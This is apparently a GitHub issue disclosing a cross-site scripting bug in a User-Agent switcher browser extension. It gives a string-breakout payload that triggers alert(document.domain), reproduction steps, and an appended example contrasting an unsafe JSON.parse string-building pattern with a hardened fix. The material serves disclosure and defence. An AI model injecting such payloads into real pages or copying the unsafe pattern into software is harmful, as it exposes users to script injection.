
Reflected Cross-Site Scripting (XSS)

Open stevesec opened this issue 3 years ago • 0 comments

Hi there,

I was able to perform a Cross-Site Scripting attack using the User-Agent Switcher and Manager on Chrome build 105.0.5. This persisted across the browser until the User-Agent was removed.

document.currentScript.dataset.injected = true;
            const o = JSON.parse('{"userAgent":""}'); alert(document.domain);// const o=JSON.parse('{"userAgent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36","appVersion":""}'); alert(document.domain);","platform":"","vendor":"Google Inc.","product":"","oscpu":"[delete]","buildID":"[delete]","productSub":"20030107"}');

            for (const key of Object.keys(o)) {
              if (o[key] === '[delete]') {
                delete Object.getPrototypeOf(window.navigator)[key];
              }
              else {
                navigator.__defineGetter__(key, () => {
                  if (o[key] === 'empty') {
                    return '';
                  }
                  return o[key];
                });
              }
            }
          }

[Image: chrome_debugger_xss]

I was able to insert "}'); alert(document.domain);// into the User-Agent Switcher and Manager and return a JavaScript alert box. This was tested on Firefox as well and succeeded.

Steps to reproduce:

  1. Download User-Agent Switcher and Manager
  2. Enter in custom User-Agent - "}'); alert(document.domain);//
  3. Note the JavaScript alert box

Please let me know if I can do anything to help in this situation. Thank you!

stevesec, Sep 06 '22 19:09
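
The injected script in the report shows the settings JSON pasted inside a single-quoted `JSON.parse('...')` literal, which a `'` in the User-Agent value can close. The following is an added example, not part of the original issue and not the extension's own code: `buildUnsafe`, `buildSafe`, `run` and `APPLY` are hypothetical names, the unsafe builder is an assumption reconstructed from that output, and `navigator`, `document` and `alert` are stubs so it runs outside a browser.

```javascript
// Custom User-Agent value taken from the report's reproduction steps.
const PAYLOAD = '"}\'); alert(document.domain);//';

// Simplified stand-in for the loop that copies the settings onto navigator.
const APPLY = 'for (const k of Object.keys(o)) navigator[k] = o[k];';

// Assumed vulnerable pattern: the JSON text is valid JSON, but it is placed
// inside a single-quoted JS string literal and JSON.stringify never escapes '.
function buildUnsafe(prefs) {
  return "const o = JSON.parse('" + JSON.stringify(prefs) + "');\n" + APPLY;
}

// Hardened form: serialize twice. The outer JSON.stringify emits a complete
// double-quoted JS string literal with " and \ escaped, so the settings stay
// data. "<" is also escaped in case the source ends up in inline <script> markup.
function buildSafe(prefs) {
  const literal = JSON.stringify(JSON.stringify(prefs)).replace(/</g, '\\u003c');
  return 'const o = JSON.parse(' + literal + ');\n' + APPLY;
}

// Runs generated source against stubbed page objects and records alert() calls.
function run(source) {
  const alerts = [];
  const navigator = {};
  const page = new Function('navigator', 'document', 'alert', source);
  page(navigator, { domain: 'example.test' }, (msg) => alerts.push(msg));
  return { alerts, userAgent: navigator.userAgent };
}

const unsafeResult = run(buildUnsafe({ userAgent: PAYLOAD }));
const safeResult = run(buildSafe({ userAgent: PAYLOAD }));

console.log('unsafe alert() calls:', unsafeResult.alerts);
console.log('safe alert() calls:  ', safeResult.alerts);
console.log('safe userAgent kept as data:', safeResult.userAgent === PAYLOAD);
```

Passing the settings through a non-script channel (for example a `data-` attribute read by a static script) avoids generating script source from user input at all.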